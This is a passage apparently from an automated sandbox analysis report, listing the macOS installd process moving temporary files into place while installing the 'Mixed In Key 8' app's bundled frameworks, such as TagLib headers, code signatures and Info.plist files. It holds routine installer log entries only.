              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_VTT8eA -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/s3mfile.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_xlM2ZA -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/s3mproperties.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_cI5plv -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mp4properties.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_2Dh8jD -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mpegfile.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_j4xgNu -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/asfproperties.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_Iy9uMA -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/itproperties.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_wJptPL -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/ownershipframe.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_eiyJhD -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tmap.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_ZXOeMJ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/taglib.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_9xJQt8 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v1genres.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_2eWFnH -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mpcfile.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_GMaSWQ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/trefcounter.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_1uuNxo -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tlist.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_GPnYsu -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/uniquefileidentifierframe.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_Th1CSx -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/flacproperties.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_MQ6YgO -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/trueaudioproperties.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_7EPDpE -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tdebuglistener.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_S5eopU -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/aifffile.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_vHlGbf -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/opusfile.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_Kt8ww1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tiostream.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_bFVFPS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mp4atom.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_UxDkzI -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/apetag.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_jogQ5K -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/modtag.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_v3DNzq -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/asffile.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_2hSgag -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/textidentificationframe.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_bhGASy -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/asfattribute.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_YhXxOl -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/oggpageheader.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_1Iwpux -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mpcproperties.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_5BaPmX -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/flacfile.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_POI7pe -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/modfilebase.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_u90YHb -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/urllinkframe.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_2d01YM -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2tag.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Modules/.BC.T_so8dts -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Modules/module.modulemapJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_oSnqYE -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftFoundation.dylibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/_CodeSignature/.BC.T_jtnRA4 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/_CodeSignature/CodeResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/.BC.T_R452Ac -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/DanceabilityAudioEngineJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/Resources/en.lproj/.BC.T_FvvhWi -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/Resources/en.lproj/InfoPlist.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/Resources/.BC.T_fPouHv -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/Resources/Info.plistJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/_CodeSignature/.BC.T_M74tW7 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/_CodeSignature/CodeResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/Resources/.BC.T_fibLqQ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/Resources/Info.plistJump to behavior
